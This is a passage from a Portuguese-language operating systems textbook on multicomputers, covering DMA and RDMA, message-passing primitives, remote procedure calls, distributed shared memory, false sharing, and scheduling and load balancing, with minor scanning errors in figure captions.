cionar todos os segmentos com o mesmo índice de es- 
palhamento na mesma fila que é servida por um núcleo 
específico. Isso também é útil para a virtualização, à 
medida que ela nos permite dar a cada máquina virtual 
sua própria fila. 
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Comunicação entre o nó e a interface de rede 


Outra questão é como copiar pacotes para a placa de 
interface. A maneira mais rápida é usar o chip de DMA 
na placa apenas para copiá-los da RAM. O problema 
com essa abordagem é que o DMA pode usar endereços 
físicos em vez de virtuais e executar independentemen- 
te da CPU, a não ser que uma MMU de E/S esteja pre- 
sente. Para começo de conversa, embora um processo 
do usuário decerto saiba o endereço virtual de qualquer 
pacote que ele queira enviar, ele em geral não conhece 
o endereço físico. Fazer uma chamada de sistema para 
realizar todo o mapeamento virtual para físico é algo in- 
desejável, pois o sentido de se colocar a placa de inter- 
face no espaço do usuário em primeiro lugar era evitar 
ter de fazer uma chamada de sistema para cada pacote 
a ser enviado. 

Além disso, se o sistema operacional decidir subs- 
tituir uma página enquanto o chip do DMA estiver 
copiando um pacote dele, os dados errados serão trans- 
mitidos. Pior ainda, se o sistema operacional substituir 
uma página enquanto o chip do DMA estiver copiando 
um pacote que chega para ele, não apenas o pacote que 
está chegando será perdido, mas também uma página de 
memória inocente será arruinada, provavelmente com 
consequências desastrosas. 

Esses problemas podem ser evitados com chamadas 
de sistema para fixar e liberar páginas na memória, mar- 
cando-as como temporariamente não pagináveis. No en- 
tanto, ter de fazer uma chamada de sistema para fixar a 
página contendo cada pacote que sai e então ter de fazer 
outra chamada mais tarde para liberá-la sai caro. Se os 
pacotes forem pequenos, digamos, 64 bytes ou menos, 
a sobrecarga para fixar e liberar cada buffer será proi- 
bitiva. Para pacotes grandes, digamos, | KB ou mais, 
isso pode ser tolerável. Para tamanhos intermediários, 
depende dos detalhes do hardware. Além de introduzir 
uma taxa de desempenho, fixar e liberar páginas torna o 
software mais complexo. 


Acesso direto à memória remota 


Em alguns campos, altas latências de rede simples- 
mente não são aceitáveis. Por exemplo, para determi- 
nadas aplicações em computação de alto desempenho, 
o tempo de computação é fortemente dependente da la- 
tência de rede. De maneira semelhante, a negociação 
de alta frequência depende absolutamente de computa- 
dores desempenharem transações (compra e venda de 
ações) a velocidades altíssimas — cada microssegundo 
conta. Se é ou não sensato ter programas de computador 
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negociando milhões de dólares em ações em um milis- 
segundo, quando praticamente todos os softwares ten- 
dem a apresentar defeitos, é uma questão interessante 
para filósofos discutirem no jantar enquanto se ocupam 
com seus garfos. Mas não para este livro. O ponto aqui é 
que se você consegue baixar a latência, é certo que isso 
lhe renderá pontos com seu chefe. 

Nesses cenários, vale a pena reduzir a quantidade 
de cópias. Por essa razão, algumas interfaces de rede 
dão suporte ao RDMA (Remote Direct Memory Ac- 
cess — acesso direto à memória remota), uma técnica 
que permite que uma máquina desempenhe um aces- 
so de memória direto de um computador para outro. O 
RDMA não envolve nenhum sistema operacional e os 
dados são buscados diretamente da — e escritos para 
a — memória de aplicação. 

O RDMA parece muito bacana, mas também tem 
suas desvantagens. Assim como o DMA normal, o sis- 
tema operacional nos nós de comunicação deve fixar as 
páginas envolvidas na troca de dados. Também, apenas 
colocar os dados na memória remota de um computa- 
dor não reduzirá muito a latência se o outro programa 
não tiver ciência disso. Um RDMA bem-sucedido não 
vem automaticamente com uma notificação explicita. 
Em vez disso, uma solução comum é um receptor testar 
um byte na memória. Quando a transferência for feita, o 
emissor modifica o byte para sinalizar o receptor de que 
há dados novos. Embora essa solução funcione, ela não 
é ideal e desperdiça ciclos da CPU. 

Para negociação de alta frequência realmente séria, 
as placas de rede são construídas sob medida usando 
FPGAs (Field-Programmable Gate Arrays — arranjos 
de portas programáveis em campo). Eles têm latência 
de uma extremidade à outra (wire-to-wire), da recepção 
dos bits na placa de rede à transmissão de uma mensa- 
gem para comprar alguns milhões de algo, em bem me- 
nos do que um microssegundo. Comprar US$ 1 milhão 
em ações em 1 us proporciona um desempenho de 1 
teradólar/s, o que é bacana se você acertar as subidas e 
descidas da bolsa, mas exige um coração forte. Sistemas 
operacionais não têm um papel muito importante nesse 
tipo de cenário extremo. 


8.2.3 Software de comunicação no nível do 
usuário 


Processos em CPUs diferentes em um multicom- 
putador comunicam-se enviando mensagens uns para 
os outros. Na forma mais simples, essa troca de men- 
sagens é exposta aos processos do usuário. Em ou- 
tras palavras, o sistema operacional proporciona uma 


maneira de se enviar e receber mensagens, e rotinas de 
biblioteca tornam essas chamadas subjacentes disponi- 
veis para os processos do usuário. Em uma forma mais 
sofisticada, a troca de mensagens real é escondida dos 
usuários ao fazer com que a comunicação remota pa- 
reça uma chamada de rotina. Estudaremos ambos os 
métodos em seguida. 


Envio e recepção 


No mínimo dos mínimos, os serviços de comunica- 
ção fornecidos podem ser reduzidos a duas chamadas 
(de biblioteca), uma para enviar mensagens e outra para 
recebê-las. A chamada para enviar uma mensagem po- 
deria ser 


send(dest, &mptr); 
e a chamada para receber uma mensagem poderia ser 
receive(addr, &mptr); 


A primeira envia a mensagem apontada por mptr 
para um processo identificado por dest e faz o pro- 
cesso que a chamou ser bloqueado até que a mensa- 
gem tenha sido enviada. A segunda faz o processo 
que a chamou ser bloqueado até a chegada da men- 
sagem. Quando isso ocorre, a mensagem é copiada 
para o buffer apontado por mptr e o processo cha- 
mado é desbloqueado. O parâmetro addr especifica 
o endereço para o qual o receptor está à espera. São 
possíveis muitas variantes dessas duas rotinas e seus 
parâmetros. 

Uma questão é como o endereçamento é feito. Dado 
que multicomputadores são estáticos, com o número de 
CPUs fixo, a forma mais fácil de lidar com o endereça- 
mento é tornar addr um endereço de duas partes consis- 
tindo em um número de CPU e um processo ou número 
de porta na CPU endereçada. Dessa maneira, cada CPU 
pode gerenciar os seus próprios endereços sem conflitos 
potenciais. 


Chamadas bloqueantes versus não bloqueantes 


As chamadas descritas são chamadas bloqueantes 
(às vezes conhecidas por chamadas síncronas). Quan- 
do um processo chama send, ele especifica um destino e 
um buffer para enviar àquele destino. Enquanto a men- 
sagem está sendo enviada, o processo emissor é bloque- 
ado (isto é, suspenso). A instrução seguindo a chamada 
para send não é executada até a mensagem ter sido com- 
pletamente enviada, como mostrado na Figura 8.19(a). 
De modo similar, uma chamada para receive não retorna 
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le WED (a) Uma chamada send bloqueante. (b) Uma chamada send não bloqueante. 
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o controle até que a mensagem tenha sido realmente 
recebida e colocada no buffer de mensagem apontado 
pelo parâmetro. O processo segue suspenso em receive 
até a mensagem chegar, mesmo que isso leve horas. Em 
alguns sistemas, o receptor pode especificar de quem 
espera receber, nesse caso ele permanece bloqueado até 
chegar uma mensagem daquele emissor. 

Uma alternativa às chamadas bloqueantes é usar as 
chamadas não bloqueantes (às vezes conhecidas por 
chamadas assíncronas). Se send for não bloqueante, 
ele retorna o controle para o processo chamado imedia- 
tamente antes de a mensagem ser enviada. A vantagem 
desse esquema é que o processo emissor pode continuar 
a calcular em paralelo com a transmissão da mensagem, 
em vez de a CPU ter de ficar ociosa (presumindo que 
nenhum outro processo seja executável). A escolha en- 
tre primitivas bloqueantes e não bloqueantes é em geral 
feita pelos projetistas do sistema (isto é, ou uma primiti- 
va ou outra está disponível), embora em alguns sistemas 
ambas estão disponíveis e os usuários podem escolher 
a sua favorita. 

No entanto, a vantagem de desempenho oferecida 
por primitivas não bloqueantes é superada por uma séria 
desvantagem: o emissor não pode modificar o buffer da 
mensagem até que ela tenha sido enviada. As consequên- 
cias de o processo sobrescrever a mensagem durante a 
transmissão são terríveis demais para serem contem- 
pladas. Pior ainda, o processo emissor não faz ideia de 
quando a transmissão terminou, então ele nunca sabe 
quando é seguro reutilizar o buffer. Ele mal pode evitar 
tocá-lo para sempre. 


(b) 


Há três saídas possíveis, a primeira solução é fazer 
o núcleo copiar a mensagem para um buffer de núcleo 
interno e então permitir que o processo continue, como 
mostrado na Figura 8.19(b). Do ponto de vista do emis- 
sor, esse esquema é o mesmo que uma chamada bloque- 
ante: tão logo recebe o controle de volta, ele está livre 
para reutilizar o buffer. É claro, a mensagem não terá 
sido enviada ainda, mas o emissor não estará impedi- 
do por causa disso. A desvantagem desse método é que 
toda mensagem de saída tem de ser copiada do espaço 
do usuário para o espaço do núcleo. Com muitas inter- 
faces de rede, a mensagem terá de ser copiada de qual- 
quer forma para um buffer de transmissão de hardware 
mais tarde, de modo que a cópia seja essencialmente 
desperdiçada. A cópia extra pode reduzir o desempenho 
do sistema consideravelmente. 

A segunda solução é interromper (sinalizar) o emis- 
sor quando a mensagem tiver sido completamente en- 
viada para informá-lo de que o buffer está mais uma vez 
disponível. Nenhuma cópia é exigida aqui, o que poupa 
tempo, mas interrupções no nível do usuário tornam a 
programação complicada, difícil e sujeita a condições 
de corrida, o que a torna irreproduzível e quase impos- 
sível de depurar. 

A terceira solução é fazer o buffer copiar na escri- 
ta, isto é, marcá-lo como somente de leitura até que a 
mensagem tenha sido enviada. Se o buffer for reutili- 
zado antes de a mensagem ter sido enviada, uma cópia 
é feita. O problema com essa solução é que, a não ser 
que o buffer seja isolado na sua própria página, escritas 
para variáveis próximas também forçarão uma cópia. 
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Também, uma administração extra é necessária, pois o 
ato de enviar uma mensagem agora afeta implicitamen- 
te o status de leitura/escrita da página. Por fim, mais 
cedo ou mais tarde é provável que a página seja escrita 
de novo, desencadeando uma cópia que talvez não seja 
mais necessária. 

Desse modo, as escolhas do lado emissor são: 


1. Envio bloqueante (CPU ociosa durante a trans- 
missão da mensagem). 

2. Envio não bloqueante com cópia (tempo da CPU 
desperdiçado para cópia extra). 

3. Envio não bloqueante com interrupção (torna a 
programação dificil). 

4. Cópia na escrita (uma cópia extra provavelmente 
será necessária). 


Em condições normais, a primeira escolha é a mais 
conveniente, especialmente se múltiplos threads es- 
tiverem disponíveis, nesse caso enquanto um thread 
está bloqueado tentando enviar, outros podem conti- 
nuar trabalhando. Ela também não exige que quaisquer 
buffers de núcleo sejam gerenciados. Além disso, como 
da comparação da Figura 8.19(a) com a Figura 8.19(b), 
a mensagem normalmente será enviada mais rápido se 
nenhuma cópia for necessária. 

Gostaríamos de deixar registrado que alguns auto- 
res usam um critério diferente para distinguir primiti- 
vas síncronas de assíncronas. Na visão alternativa, uma 
chamada é síncrona somente se o emissor for bloqueado 
até a mensagem ter sido recebida e uma confirmação 
enviada de volta (ANDREWS, 1991). No mundo da co- 
municação em tempo real, o termo tem outro significa- 
do, que infelizmente pode levar à confusão. 

Assim como send pode ser bloqueante ou não blo- 
queante, da mesma forma receive pode ser os dois. Uma 
chamada bloqueante apenas suspende o processo que 
a chamou até a mensagem ter chegado. Se múltiplos 
threads estiverem disponíveis, esta é uma abordagem 
simples. De modo alternativo, um receive não bloque- 
ante apenas diz ao núcleo onde está o buffer e retorna 
o controle quase imediatamente. Uma interrupção pode 
ser usada para sinalizar que uma mensagem chegou. No 
entanto, interrupções são difíceis de programar e tam- 
bém bastante lentas, então talvez seja preferível para o 
receptor testar mensagens que estejam chegando usan- 
do uma rotina, poll, que diz se há alguma mensagem 
esperando. Em caso afirmativo, o processo chamado 
pode chamar get message, que retorna a primeira men- 
sagem que chegou. Em alguns sistemas, o compilador 
pode inserir chamadas de teste no código em lugares 
apropriados, embora seja complicado encontrar a me- 
lhor frequência de sua utilização. 


Outra opção ainda é um esquema no qual a chegada 
de uma mensagem faz com que um thread novo seja 
criado espontaneamente no espaço de endereçamento 
do processo receptor. Esse thread é chamado de thread 
pop-up. Ele executa uma rotina especificada antes e 
cujo parâmetro é um ponteiro para a mensagem que 
chega. Após processar a mensagem, ele apenas termina 
e é automaticamente destruído. 

Uma variante dessa ideia é executar o código recep- 
tor diretamente no tratador da interrupção, sem passar 
o trabalho de criar um thread pop-up. Para tornar esse 
esquema ainda mais rápido, a mensagem em si contém 
o endereço do tratador, então quando uma mensagem 
chega, o tratador pode ser chamado com poucas ins- 
truções. A grande vantagem aqui é que nenhuma cópia 
é necessária. O tratador pega a mensagem da placa de 
interface e a processa no mesmo instante. Esse esque- 
ma é chamado de mensagens ativas (VON EICKEN 
et al., 1992). Como cada mensagem contém o endereço 
do tratador, mensagens ativas funcionam apenas quan- 
do os emissores e os receptores confiam uns nos outros 
completamente. 


8.2.4 Chamada de rotina remota 


Embora o modelo de troca de mensagens proporcio- 
ne uma maneira conveniente de estruturar um sistema 
operacional de multicomputadores, ele sofre de uma fa- 
lha incurável: o paradigma básico em torno do qual toda 
a economia é construída é entrada/saída. As rotinas send 
e receive estão fundamentalmente engajadas em realizar 
E/S, e muitas pessoas acreditam que E/S é o modelo de 
programação errado. 

Esse problema é conhecido há bastante tempo, mas 
pouco foi feito a respeito até que um estudo de Birrell 
e Nelson (1984) introduziu uma maneira completamen- 
te diferente de atacar o problema. Embora a ideia seja 
agradavelmente simples (assim que alguém pensou a 
respeito), as implicações são muitas vezes sutis. Nes- 
ta seção examinaremos o conceito, sua implementação, 
seus pontos fortes e seus pontos fracos. 

Em suma, o que Birrell e Nelson sugeriram foi per- 
mitir que os programas chamassem rotinas localizadas 
em outras CPUs. Quando um processo na máquina 1 
chama uma rotina na máquina 2, o processo chamador 
na 1 é suspenso, e a execução do processo chamado 
ocorre na 2. Informações podem ser transportadas do 
chamador para o chamado nos parâmetros e pode voltar 
no resultado da rotina. Nenhuma troca de mensagens ou 
E/S é visível ao programador. Essa técnica é conhecida 
como RPC (Remote Procedure Call — chamada de 


rotina remota) e tornou-se a base de uma grande quan- 
tidade de softwares de multicomputadores. Tradicional- 
mente o procedimento chamador é conhecido como o 
cliente e o procedimento chamado é conhecido como o 
servidor, e usaremos esses nomes aqui também. 

A ideia por trás do RPC é fazer com que uma chama- 
da de rotina remota pareça o mais próxima possível de 
uma chamada a uma rotina local. Na forma mais sim- 
ples, para chamar um procedimento remoto, o programa 
cliente deve ser ligado a uma rotina de biblioteca pe- 
quena chamada stub do cliente que representa a rotina 
do servidor no espaço de endereçamento do cliente. De 
modo similar, o servidor é ligado a uma rotina chamada 
stub do servidor. Essas rotinas escondem o fato de que 
a chamada de rotina do cliente para o servidor não é 
local. 

Os passos reais na realização de uma RPC são mos- 
trados na Figura 8.20. O passo 1 é o cliente chamando o 
stub do cliente. Essa chamada é uma chamada de rotina 
local, com os parâmetros empurrados para a pilha como 
sempre. O passo 2 é o stub do cliente empacotando os 
parâmetros em uma mensagem e fazendo uma chamada 
de sistema para enviar a mensagem. O empacotamento 
dos parâmetros é chamado de marshalling (prepara- 
ção). O passo 3 é o núcleo enviando a mensagem da 
máquina do cliente para a máquina do servidor. O passo 
4 é o núcleo passando o pacote que chega para o stub 
do servidor (que em geral teria chamado receive antes). 
Por fim, o passo 5 é o stub do servidor chamando a ro- 
tina do servidor. A resposta segue o mesmo caminho na 
outra direção. 

O item fundamental a ser observado aqui é que a 
rotina do cliente, escrita pelo usuário, apenas faz uma 
chamada de rotina normal (isto é, local) para o stub do 
cliente, que tem o mesmo nome que a rotina do servidor. 
Dado que a rotina do cliente e o stub do cliente estão 
no mesmo espaço de endereçamento, os parâmetros são 
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passados da maneira usual. De modo similar, a rotina 
do servidor é chamada por uma rotina em seu espaço 
de endereçamento com os parâmetros que ela espera. 
Para a rotina do servidor, nada é incomum. Dessa ma- 
neira, em vez de realizar E/S usando send e receive, a 
comunicação remota é feita simulando uma chamada de 
rotina local. 


Questões de implementação 


Apesar da elegância conceitual da RPC, ela apre- 
senta algumas armadilhas. Uma questão importante é o 
uso de parâmetros do tipo ponteiro. Em geral, passar um 
ponteiro para uma rotina não é um problema. O procedi- 
mento chamado pode usar o ponteiro da mesma maneira 
que o chamador, pois as duas rotinas residem no mesmo 
espaço de endereço virtual. Com a RPC, a passagem de 
ponteiros torna-se impossível, pois o cliente e o servidor 
encontram-se em espaços de endereçamento diferentes. 

Em alguns casos, podem ser usados truques para tor- 
nar possível a passagem de ponteiros. Suponha que o 
primeiro parâmetro seja um ponteiro para um inteiro, 
k. O stub do cliente pode preparar o k e enviá-lo para o 
servidor. O stub do servidor então cria um ponteiro para 
k e o passa para a rotina do servidor, como ele esperava. 
Quando a rotina do servidor retorna o controle para o 
stub do servidor, este envia k de volta para o cliente, 
onde o novo k é copiado sobre o antigo, como garan- 
tia caso o servidor o tenha modificado. Na realidade, 
a sequência de chamada padrão da chamada por refe- 
rência foi substituída pela cópia-restauração. Infeliz- 
mente, esse truque nem sempre funciona, por exemplo, 
se o ponteiro apontar para um grafo ou outra estrutura 
de dados complexa. Por essa razão, algumas restrições 
precisam ser colocadas sobre os parâmetros para rotinas 
chamadas remotamente. 


aeii: TE: Passos na realização de uma chamada de rotina remota. Os stubs estão sombreados em cinza. 
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Um segundo problema é que em linguagens fraca- 
mente tipificadas, como C, é perfeitamente legal escre- 
ver uma rotina que calcule o produto interno de dois 
vetores (arranjos), sem especificar o seu tamanho. Cada 
um poderia ser terminado por um valor especial co- 
nhecido somente para as rotinas chamadora e chama- 
da. Nessas circunstâncias, é essencialmente impossível 
para o stub do cliente preparar os parâmetros: ele não 
tem como determinar o seu tamanho. 

Um terceiro problema é que nem sempre é possível 
deduzir os tipos dos parâmetros, nem mesmo a partir de 
uma especificação formal do código em si. Um exem- 
plo é printf, que pode ter qualquer número de parâme- 
tros (pelo menos um), e eles podem ser uma mistura 
arbitrária de inteiros, curtos, longos, caracteres, cadeias 
de caracteres, números em ponto flutuante de tamanhos 
diversos e outros tipos. Tentar chamar printf de rotina 
remota seria praticamente impossível, pois C é muito 
permissiva. No entanto, uma regra dizendo que a RPC 
pode ser usada desde que você não programe em C (ou 
C ++) não seria popular. 

Um quarto problema diz respeito ao uso de variá- 
veis globais. Em geral, as rotinas chamada e chamado- 
ra podem comunicar-se usando variáveis globais, além 
de comunicar-se através de parâmetros. Se a rotina 
chamada é movida agora para uma máquina remota, o 
código falhará, pois as variáveis globais não são mais 
compartilhadas. 

Esses problemas não implicam que a RPC é incorri- 
gível. Na realidade, ela é amplamente usada, mas algu- 
mas restrições e cuidados são necessários para fazê-la 
funcionar bem na prática. 


8.2.5 Memória compartilhada distribuída 


Embora a RPC tenha os seus atrativos, muitos pro- 
gramadores ainda preferem um modelo de memória 
compartilhada e gostariam de usá-lo, mesmo em um 
multicomputador. De maneira bastante surpreendente, 
é possível preservar a ilusão da memória compartilhada 
razoavelmente bem, mesmo que ela não exista de fato, 
usando uma técnica chamada DSM (Distributed Sha- 
red Memory — memória compartilhada distribuída) 
(LI, 1986; LI e HUDAK, 1989). Apesar de ser um velho 
tópico, a pesquisa sobre ela ainda segue forte (CAI e 
STRAZDINS, 2012; CHOI e JUNG, 2013; OHNISHI 
e YOSHIDA, 2011). A DSM é uma técnica útil para ser 
estudada, à medida que ela mostra muitas das questões 
e complicações em sistemas distribuídos. Além disso, 
a ideia em si tem sido bastante influente. Com DSM, 
cada página é localizada em uma das memórias da 


Figura 8.1(b). Cada máquina tem a sua própria memó- 
ria virtual e tabelas de página. Quando uma CPU realiza 
um LOAD ou STORE em uma página que ela não tem, 
ocorre uma captura para o sistema operacional. O sis- 
tema operacional então localiza a página e pede à CPU 
que a detém no momento para removê-la de seu ma- 
peamento e enviá-la através da rede de interconexão. 
Quando ela chega, a página é mapeada e a instrução 
faltante é reiniciada. Na realidade, o sistema operacio- 
nal está apenas satisfazendo faltas de páginas da RAM 
remota em vez do disco local. Para o usuário, é como se 
a máquina tivesse a memória compartilhada. 

A diferença entre a memória compartilhada real e a 
DSM está ilustrada na Figura 8.21. Na Figura 8.21(a), 
vemos um verdadeiro multiprocessador com memória 
compartilhada física implementada pelo hardware. Na 
Figura 8.21(b), vemos DSM, implementada pelo siste- 
ma operacional. Na Figura 8.21(c), vemos ainda outra 
forma de memória compartilhada, implementada por 
níveis mais altos ainda de software. Voltaremos a essa 
terceira opção mais tarde no capítulo, mas por ora nos 
concentraremos na DSM. 

Vamos examinar agora em detalhes como a DSM 
funciona. Em um sistema DSM, o espaço de endere- 
çamento é dividido em páginas, com as páginas sendo 
disseminadas através de todos os nós no sistema. Quan- 
do uma CPU referencia um endereço que não é local, 
ocorre uma captura, e o software DSM busca a pági- 
na contendo o endereço e reinicializa a instrução com 
a falta, que agora completa de maneira bem-sucedida. 
Esse conceito está ilustrado na Figura 8.22(a) para um 
espaço de endereço com 16 páginas e quatro nós, cada 
um capaz de conter seis páginas. 

Nesse exemplo, se a CPU 0 referencia instruções ou 
dados nas páginas 0, 2, 5, ou 9, as referências são fei- 
tas localmente. Referências para outras páginas causam 
capturas. Por exemplo, uma referência a um endereço 
na página 10 causará um desvio para o software DSM, 
que então move a página 10 do nó 1 para o nó 0, como 
mostrado na Figura 8.22(b). 


Replicação 


Uma melhoria para o sistema básico que pode me- 
lhorar o desempenho consideravelmente é replicar pá- 
ginas que são somente de leitura, por exemplo, código 
do programa, constantes somente de leitura, ou outras 
estruturas de dados somente de leitura. Por exemplo, 
se a página 10 na Figura 8.22 é uma seção do código 
de programa, o seu uso pela CPU 0 pode resultar em 
uma cópia sendo enviada para a CPU 0 sem o original 
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le WADO Diversas camadas onde a memória compartilhada pode ser implementada. (a) O hardware. (b) O sistema operacional. (c) 
Software no nível do usuário. 
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lc yi) (a) Páginas do espaço de endereçamento distribuídas entre quatro máquinas. (b) Situação após a CPU O referenciar a 
página 10 e esta ser movida para lá. (c) Situação se a página 10 é do tipo somente leitura e a replicação é usada. 
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na memória da CPU 1 sendo invalidada ou perturba- 
da, como mostrado na Figura 8.22(c). Dessa maneira, 
CPUs 0 e 1 podem ambas referenciar a página 10 quan- 
tas vezes forem necessárias sem causar interrupções de 
software para buscar a memória perdida. 

Outra possibilidade é replicar não apenas páginas 
somente de leitura, mas também todas as páginas. En- 
quanto as leituras estão sendo feitas, não há de fato di- 
ferença alguma entre replicar uma página somente de 
leitura e replicar uma página de leitura e escrita. No 
entanto, se uma página replicada for subitamente modi- 
ficada, uma ação especial precisa ser tomada para evi- 
tar que ocorram múltiplas cópias inconsistentes. Como 
a inconsistência é evitada será discutido nas seções a 
seguir. 


Falso compartilhamento 


Os sistemas DSM são similares a multiprocessado- 
res em aspectos chave. Em ambos os sistemas, quando 
uma palavra de memória não local é referenciada, um 
bloco de memória contendo a palavra é buscado da sua 
localização atual e colocado na máquina fazendo a refe- 
rência (memória principal ou cache, respectivamente). 
Uma questão de projeto importante é: qual o tamanho 
que deve ter esse bloco? Em multiprocessadores, o ta- 
manho do bloco da cache é normalmente 32 ou 64 bytes, 
para evitar prender o barramento com uma transferên- 
cia longa demais. Em sistemas DSM, a unidade tem de 
ser um múltiplo do tamanho da página (porque o MMU 
funciona com páginas), mas pode ser 1, 2, 4, ou mais 
páginas. Na realidade, realizar isso simula um tamanho 
de página maior. 

Há vantagens e desvantagens para um tamanho de 
página maior para DSM. A maior vantagem é que como 
o tempo de inicialização para uma transferência de rede 
é substancial, não leva realmente muito mais tempo 
transferir 4.096 bytes do que 1.024 bytes. Ao transferir 


dados em grandes unidades, quando uma parte grande 
do espaço de endereçamento precisa ser movida, o nú- 
mero de transferências muitas vezes pode ser reduzido. 
Essa propriedade é especialmente importante porque 
muitos programas apresentam localidade de referência, 
significando que se um programa referenciou uma pala- 
vra em uma página, é provável que ele referencie outras 
palavras na mesma página em um futuro imediato. 

Por outro lado, a rede estará presa mais tempo com 
uma transferência maior, bloqueando outras faltas cau- 
sadas por outros processos. Também, uma página efeti- 
va grande demais introduz um novo problema, chamado 
de falso compartilhamento, ilustrado na Figura 8.23. 
Aqui temos uma página contendo duas variáveis com- 
partilhadas não relacionadas, 4 e B. O processador 1 faz 
um uso pesado de 4, lendo-o e escrevendo-o. De modo 
similar, o processo 2 usa B frequentemente. Nessas cir- 
cunstâncias, a página contendo ambas as variáveis esta- 
rá constantemente se deslocando para lá e para cá entre 
as duas máquinas. 

O problema aqui é que, embora as variáveis não se- 
jam relacionadas, elas aparecem por acidente na mesma 
página, então quando um processo utiliza uma delas, ele 
também recebe a outra. Quanto maior o tamanho da pá- 
gina efetiva, maior a frequência da ocorrência de falso 
compartilhamento e, de maneira inversa, quanto menor 
o tamanho da página efetiva, menor a frequência dessa 
ocorrência. Nada análogo a esse fenômeno está presente 
em sistemas comuns de memória virtual. 

Compiladores inteligentes que compreendem o pro- 
blema e colocam variáveis no espaço de endereçamento 
conformemente, podem ajudar a reduzir o falso compar- 
tilhamento e incrementar o desempenho. No entanto, di- 
zer isso é mais fácil do que fazê-lo. Além disso, se o falso 
compartilhamento consiste do nó 1 usando um elemento 
de um arranjo e o nó 2 usando um elemento diferente 
do mesmo arranjo, há pouco que mesmo um compilador 
inteligente possa fazer para eliminar o problema. 


KETEFA] Falso compartilhamento de uma página contendo duas variáveis não relacionadas. 
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Obtendo consistência sequencial 


Se as páginas que podem ser escritas não são repli- 
cadas, atingir a consistência não é problema. Há exata- 
mente uma cópia de cada página que pode ser escrita, e 
ela é movida para lá e para cá dinamicamente conforme 
a necessidade. Sabendo que nem sempre é possível ver 
antecipadamente quais páginas podem ser escritas, em 
muitos sistemas DSM, quando um processo tenta ler 
uma página remota, uma cópia local é feita e tanto a 
cópia local quanto a remota são configuradas em suas 
respectivas MMUs como somente de leitura. Enquanto 
as referências forem de leitura, está tudo bem. 

No entanto, se qualquer processo tentar escrever em 
uma página replicada, surgirá um problema de consis- 
tência potencial, pois mudar uma cópia e deixar as ou- 
tras sozinhas é algo inaceitável. Essa situação é análoga 
ao que acontece em um multiprocessador quando uma 
CPU tenta modificar uma palavra que está presente em 
múltiplas caches. A solução encontrada ali é a CPU que 
está prestes a escrever para primeiro colocar um sinal no 
barramento dizendo todas as CPUs para descartarem sua 
cópia do bloco da cache. Sistemas DSM funcionam des- 
sa maneira. Antes que uma página compartilhada possa 
ser escrita, uma mensagem é enviada para todas as outras 
CPUs que detêm uma cópia da página solicitando a elas 
para removerem o mapeamento e descartarem a página. 
Após todas elas terem respondido que o mapeamento foi 
removido, a CPU original pode então realizar a escrita. 

Também é possível tolerar múltiplas páginas que po- 
dem ser escritas em circunstâncias cuidadosamente res- 
tritas. Uma maneira é permitir que um processo adquira 
uma variável de travamento em uma porção do espaço 
de endereçamento virtual, e então desempenhar múltiplas 
operações de leitura e escrita na memória travada. No mo- 
mento em que a variável de travamento for liberada, mu- 
danças podem ser propagadas para outras cópias. Desde 
que somente uma CPU possa travar uma página em um 
dado momento, esse esquema preserva a consistência. 

De modo alternativo, quando uma página que poten- 
cialmente pode ser escrita é de fato escrita pela primeira 
vez, uma cópia limpa é feita e salva na CPU realizan- 
do a escrita. Travas na página podem ser adquiridas e 
a página atualizada e as travas, liberadas. Mais tarde, 
quando um processo em uma máquina remota tenta 
adquirir uma variável de travamento na página, a CPU 
que escreveu nela anteriormente compara o estado atual 
da página com a cópia limpa e constrói uma mensagem 
listando todas as palavras que mudaram. Essa lista é en- 
tão enviada para a CPU adquirente para atualizar a sua 
cópia em vez de invalidá-la (KELEHER et al., 1994). 
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8.2.6 Escalonamento em multicomputadores 


Em um multiprocessador, todos os processos resi- 
dem na mesma memória. Quando uma CPU termina a 
sua tarefa atual, ela pega um processo e o executa. Em 
principio, todos os processos são candidatos potenciais. 
Em um multicomputador, a situação é bastante diferen- 
te. Cada nó tem a sua própria memória e o seu próprio 
conjunto de processos. A CPU 1 não pode subitamente 
decidir executar um processo localizado no nó 4 sem 
primeiro trabalhar bastante para consegui-lo. Essa di- 
ferença significa que o escalonamento em multicompu- 
tadores é mais fácil, mas a alocação de processos para 
os nós é mais importante. A seguir estudaremos essas 
questões. 

O escalonamento em multicomputador é de certa 
maneira similar ao escalonamento em multiprocessa- 
dor, mas nem todos os algoritmos do primeiro aplicam- 
-se ao segundo. O algoritmo de multiprocessador mais 
simples — manter uma única lista central de processos 
prontos — não funciona, no entanto, dado que cada pro- 
cesso só pode executar na CPU em que ele está localiza- 
do no momento. No entanto, quando um novo processo 
é criado, uma escolha pode ser feita, por exemplo, onde 
colocá-lo para balancear a carga. 

Já que cada nó tem os seus próprios processos, qual- 
quer algoritmo de escalonamento pode ser usado. No 
entanto, também é possível usar o escalonamento em 
bando de multiprocessadores, já que isso exige mera- 
mente um acordo inicial sobre qual processo executar 
em qual intervalo de tempo, e alguma maneira de coor- 
denar o início dos intervalos de tempo. 


8.2.7 Balanceamento de carga 


Há relativamente pouco a ser dito a respeito do esca- 
lonamento de multicomputadores, pois uma vez que um 
processo tenha sido alocado para um nó, qualquer algo- 
ritmo de escalonamento local dará conta do recado, a não 
ser que o escalonamento em bando esteja sendo usado. 
No entanto, justamente porque há tão pouco controle so- 
bre um processo uma vez que ele tenha sido alocado para 
um nó, a decisão sobre qual processo deve ir com qual 
nó é importante. Isso contrasta com sistemas de multi- 
processadores, nos quais todos os processos vivem na 
mesma memória e podem ser escalonados em qualquer 
CPU de acordo com sua vontade. Em consequência, vale 
a pena observar como os processos podem ser alocados 
para os nós de uma maneira eficiente. Os algoritmos e as 
heurísticas para fazer isso são conhecidos como algorit- 
mos de alocação de processador. 
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Um grande numero de algoritmos de alocação de 
processadores (isto é, nós) foi proposto ao longo dos 
anos. Eles diferem no que eles assumem como conhe- 
cido e em qual é o seu objetivo. Propriedades que po- 
deriam ser conhecidas a respeito do processo incluem 
exigências de CPU, uso de memória e quantidade de 
comunicação com todos os outros processos. Metas 
possíveis incluem minimizar ciclos de CPU desperdiça- 
dos pela falta de trabalho local, minimizar a largura de 
banda de comunicação total, e assegurar justiça para os 
usuários e os processos. A seguir examinaremos alguns 
algoritmos para dar uma ideia do que é possível. 


Um algoritmo determinístico teórico de grafos 


Uma classe de algoritmos amplamente estudada é 
para sistemas consistindo de processos com exigências 
conhecidas de CPU e memória, e uma matriz conhecida 
dando a quantidade média de tráfego entre cada par de 
processos. Se o número de processos for maior do que 
o número de CPUs, k, vários processos terão de ser alo- 
cados para cada CPU. A ideia é executar essa alocação 
a fim de minimizar o tráfego de rede. 

O sistema pode ser representado como um grafo 
ponderado, com cada vértice sendo um processo e cada 
